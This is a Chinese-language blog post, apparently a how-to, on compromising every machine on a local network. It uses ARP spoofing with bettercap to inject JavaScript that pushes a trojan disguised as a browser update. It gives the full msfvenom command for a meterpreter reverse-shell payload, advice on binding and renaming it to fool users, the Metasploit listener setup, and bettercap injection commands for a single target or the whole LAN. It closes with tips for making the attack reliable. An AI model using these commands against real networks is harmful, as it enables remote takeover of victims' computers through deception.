目的

　　通過Arp欺騙， 給局域網內的所有用戶網頁中植入木馬， 只要用戶運行以后， 就會反彈一個shell到我們計算機

　　準備

　　kali系統

　　metaspolit的使用

　　Arp欺騙工具：bettercap

　　博客園賬號密碼（用來上傳小馬文件）

　　metaspolit小馬的準備

　　因為我本地的ip為151， 溢出后反彈的端口為444， 使用msfvenom生成名字為run1.exe的小馬文件：

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.151 LPORT=444 -f exe > run1.exe

　　文件是生成了，再把生成的小馬文件和其它exe合并， 避免用戶下載文件的時候起疑， 我使用exebind這個老工具：

　　把生成的exe文件放到服務器上， 我是把文件壓縮以后， 放到博客園的個人空間上， 文件名字改為瀏覽器更新程序， 用戶就會以為要更新文件， 然后去下載并打開這個文件

　　打開msf的控制臺，開始監聽本地的端口

use exploit/multi/handler
set lhost 192.168.1.151
set lport 444
set payload windows/meterpreter/reverse_tcp
exploit

　　bettercap執行Arp欺騙

　　bettercap參考官網， 此處省略1W字， 使用bettercap的添加html模塊， 給所有的HTTP頁面添加JS代碼， 當用戶點擊body標簽的時候 ， 自動打開新窗口并下載一個exe文件， 命令行的參數最好添加-G指定網關， 添加-T添加攻擊主機， 如果沒有指定-T參數， 會欺騙局域網內部的所有設備， 欺騙越多， 別人越卡:

sudo bettercap -I wlan0 -X  -T 192.168.1.150  -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

　　只要用戶瀏覽器網頁的時候， 下載了exe文件，并打開了該exe文件， 那么， 我們的kali機器會收到一個反彈的shell， 剩下的就是為所欲為了

　　欺騙全部計算機：

　　如果相對局域網內部的所有計算下手 ，bettercap的命令不用指定目標機器的IP， 如果被攻擊的局域網流量比價高的情況下，這個局域網的網絡會非常卡， 因為所有的流量都會走本地的kali機器， 測試代碼如下：

sudo bettercap -I wlan0 -X -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

　　問題：

　　因為Arp欺騙的緣故， 導致被攻擊的機器， 瀏覽網頁的速度超級慢

　　如果用戶瀏覽器網頁的時候， 如果走的是Https協議的話 ， 無法添加自定義代碼到Html頁面中

　　放在服務器上的小馬文件， 最好要把http改成https， 否者， 用戶下載文件的時候非常慢

　　本次滲透只是拿我的虛擬機進行個人測試，并沒有搞破壞

　　在虛擬機的情況下， 直接外接usb無線網卡， 然后把網橋關閉， 避免bettercap的arp -a的時候出問題

　　需要攻擊的時候，最好指定目標電腦的IP地址和局域網網關， 會更加保險， 確保能夠攻擊， 如果bettercap一條信息都沒有嗅探到， 就要看看是不是哪里出問題了

　　如果要攻擊一整個局域網的時候， 最好把需要攻擊的電腦先ping通， 避免kali系統沒找到路由表信息， 出現漏網之魚

作者： NONO
出處：http://www.cnblogs.com/diligenceday/
企業網站：http://www.idrwl.com/
開源博客：http://www.github.com/sqqihao
QQ：287101329
微信：18101055830 

廈門點燃未來網絡科技有限公司， 是廈門最好的微信應用， 小程序， 微信網站， 公眾號開發公司